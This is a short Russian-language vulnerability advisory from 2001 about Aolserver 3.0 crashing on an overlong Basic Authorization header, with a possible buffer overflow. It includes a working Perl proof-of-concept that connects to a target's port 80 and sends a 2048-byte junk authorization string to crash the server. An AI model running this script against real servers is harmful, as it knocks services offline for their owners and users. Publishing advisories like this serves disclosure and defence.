Security Lab

Уязвимость в Aolserver 3.0

Дата публикации:23.08.2001
Дата изменения:17.10.2006
Всего просмотров:1247
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Aolserver 3.0 разрушается, если ему переслать длинную строку авторизации. Также возможно эта уязвимость позволяет хакеру выполнять произвольный код через переполнение буфера.



Эксплоит:



#!/usr/bin/perl

use IO::Socket;

unless (@ARGV == 1) { die "usage: $0 host ..." }

$host = shift(@ARGV);

$remote = IO::Socket::INET->new( Proto => "tcp",

PeerAddr => $host,

PeerPort => "http(80)",

);

unless ($remote) { die "cannot connect to http daemon on $host" }



$junk = "X" x 2048;

$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n"; $remote->autoflush(1); print $remote $killme; close $remote;